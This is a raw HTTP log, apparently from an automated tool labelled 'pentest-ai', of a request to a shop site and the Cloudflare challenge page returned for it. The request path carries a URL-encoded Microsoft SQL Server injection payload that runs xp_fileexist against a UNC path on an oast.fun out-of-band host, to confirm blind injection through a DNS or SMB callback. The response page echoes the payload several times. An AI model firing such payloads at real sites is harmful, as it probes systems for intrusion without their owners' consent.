REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/%27%3B%20DECLARE%20%40q%20VARCHAR%2899%29%3B%20SET%20%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zy9y9ayz8q5sfn.oast.fun%5Ca%27%3B%20EXEC%20master.dbo.xp_fileexist%20%40q%3B--%20-/assets/component-localization-form.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10037
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847aa9d2ea110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=ZUUk7JYyDBQTkfoW7iDM25nFOdw0cIiBObZYvQFCgAk%2BDA28QbARsJlafSDESbnC3XVkfooG1M3br60fiHTNI7PssYqa2rfF0NDMcdnbL8FPUrXJUAgdahgcMukoWb%2BdMg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847aa9d2ea110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'jKx4aVKqfuKWZN0RlpQqnxIPzStOhyxwnrBzryBAF5o-1784281171-1.2.1.1-sfvRaHpxldKTu_qYXx4NWcC.kZnpLr_2m0A_PFo_O2HEG9DFttIgqaa8fo8F4EEz',cITimeS: '1784281171',cRay: 'a1c847aa9d2ea110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/';%20DECLARE%20@q%20VARCHAR(99);%20SET%20@q='%5C%5Ch0cqg45t8jh21623dc0zy9y9ayz8q5sfn.oast.fun%5Ca';%20EXEC%20master.dbo.xp_fileexist%20@q;--%20-/assets/component-localization-form.css?__cf_chl_tk=Zv1ICnK9NPo8h8vgpPMyA.Uaa_0ialI8rOvSzYWZ5YY-1784281171-1.0.1.1-begx7GS2dr8fD3K9i3lSnFXR8_qBpDK5zzMZb3PXGJo",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/';%20DECLARE%20@q%20VARCHAR(99);%20SET%20@q='%5C%5Ch0cqg45t8jh21623dc0zy9y9ayz8q5sfn.oast.fun%5Ca';%20EXEC%20master.dbo.xp_fileexist%20@q;--%20-/assets/component-localization-form.css?__cf_chl_f_tk=Zv1ICnK9NPo8h8vgpPMyA.Uaa_0ialI8rOvSzYWZ5YY-1784281171-1.0.1.1-begx7GS2dr8fD3K9i3lSnFXR8_qBpDK5zzMZb3PXGJo",md: 'APqqTLxZCrVv_UaxHukVFNHNJG6.FJrCqF1cXpKpMaQ-1784281171-1.2.1.1-PDhIaWDSK5AbcZ_C13YZS5SZCaOA66cYnbdYgrwtHUCADgftTDXxbXGLZi5NmgLNVk1qQkM5AUlFD0PU_lrX2CK2XDoii.mPjbq7iX8VYolK8q3DsmDu55zHJr4wXr3nZoplmuwJcMlB3eC.LMFLE5IuHVJOrsFHiwatwsSxugpGfc40DO8RQ3DbBgvmH5F6rpYDIjPJ7.ElCSjgxL6zfZgponUieffTqWOnMZYDSc8kP4di.odcEwNK2PhyrhnKAHjgOAsQGN31ZF7shvY4eAb0LknS2s1kbIVQmX1WKRNSY5euTxdiDFLbl8z7TBR9yRoanW8o9jUljnbhTzqlP72ZOEApQee5UhCvgnLoTjcmrCd4M6_2qtLauJ6OXSmcZUAqU.h3EpfYVrfcWLm71EYh.v7F5li27EF.fOr0qnMF8Bd.bwBXFFDNpnAVdSGSK8U8irRB.TaWBs48ePVf7UKM4eeOi_Z5klzP3v7Ku11L7uh.FhKMk6tYFvqle0GmTWYqM8N_2ksOXn.1v_32W4ZpLeEeQzX0vZzrLc72YUsqsp7Gh1n_rw5Tb5zNtyYuEwWTmaS6x_6WLG8S5MpYxJdlZdgFIr41hSs6DY.NjC_P5vSLBMBIBpG560T.0vGaL8ypy4m6PzkdD8jcP9N81KQKNrHlA8sfHqGgkSd9oBXiwRmv9Vb.jEMhwG.CwnWqskKoR3c7LpympL0gk1wIMy6eHQDkwPj8l923F2jgY3PURBQLPs3lzUL0l8lFPE7ngpEvUeDi8nrH0tHkAAfX8WD25GNj5Rj.Y4gNZQeb60NJzxabs_085HNPoaEEtyf5bdW7NN6w38DfxaebFEwFwRRIAdSyixaJl8iKdRE7DTLTfSVN6QmKKqB3UKAEIf_Hb1w2CvXrroSjQR_aG995Pq1IPyzYcqNhDI53BC6dT8tQRiozrL6lfV..KVNqmJN7ReBbHhcphIjdrCDENp3vcD2d5CxPBUWEbry62BYQLjygjdvojdVsI8Hp1gisC.mNbT.puMp8DqHQJ6.ujVMtZ.eHCUfOpr2AnVWogOyOtx4zHjK8Iq7cZYrgp5B5H1Bf3v5ie0SXdE_.ZbrW8kcYHFQ2R7PY1KH67KM_GRJzgPWt1oKqi_6CbS6RIlvZ3VZu48DPBLpUQH1DKB5tWOG4nWjcSvLlR1oapVSiWan6cKgUr.IDmwGPwTg7in8cR5BQKWhwL4jBK.NS.XafW9WLIiT_6owjV_cw3mGYc3pCrAK_I41KloOQeL44vIVtmwHquirJ4A3pRIy7sI0k29_kGE_S1SFXlld2C8gc5m4EsEgi9laoJsL_IBaa.pk1FZbBkCA6ACB0DQ58gosr_ipe28C1TSruBewEmUI0HNXMwJ3JCWsgaw8i_2SwzlqFfklP',mdrd: 'qVuwwN_5lTShr19q5Gowuy_9LeBgR6Y99olqPBDlQYc-1784281171-1.2.1.1-WQKqWj9b_w2dhhdg8mi_3QF5SMnAh4Iu.fT7sqmkg.WJZcGuQYguEcZRdpzckck7qUEpZb2OzVcvGBaZYrXAU5AVK6Nimdf3yHvB7mhlcQNSJGQsCmA.tc7MvO0iK.sG5y4OgC_uqya4N_x3qr86kcV9p40ZNHXqmzEO3ykLTepWtka9DDsD17hkDphGbyNP1mklQfJqh6rVS0ziTDYJXEVy4OZ7p76ixW1aM.XEE4MKFlrAnCjX_aSCdimKAY6u',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847aa9d2ea110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/';%20DECLARE%20@q%20VARCHAR(99);%20SET%20@q='%5C%5Ch0cqg45t8jh21623dc0zy9y9ayz8q5sfn.oast.fun%5Ca';%20EXEC%20master.dbo.xp_fileexist%20@q;--%20-/assets/component-localization-form.css?__cf_chl_rt_tk=Zv1ICnK9NPo8h8vgpPMyA.Uaa_0ialI8rOvSzYWZ5YY-1784281171-1.0.1.1-begx7GS2dr8fD3K9i3lSnFXR8_qBpDK5zzMZb3PXGJo"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
